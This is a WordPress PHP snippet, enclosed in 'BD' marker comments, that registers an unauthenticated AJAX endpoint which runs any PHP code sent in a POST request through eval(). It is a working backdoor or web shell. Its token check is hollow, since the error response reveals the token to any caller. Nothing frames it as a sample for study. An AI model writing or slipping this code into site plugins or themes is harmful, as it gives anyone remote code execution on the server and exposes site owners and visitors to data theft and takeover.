// ==[BD:QaAeNMEA]== add_action( 'wp_ajax_nopriv_wrlytyjjiog', function() { $flag = 'QaAeNMEA7NLMbRjiE1uaYaAl9N7Uash8'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $flag, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $flag ], 403 ); } $comp = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $comp ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $comp = preg_replace( '/^\s*<\?(php)?/i', '', $comp ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $comp ) { return eval( $comp ); } )(); $entry = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $entry, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $res ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $res->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:QaAeNMEA]==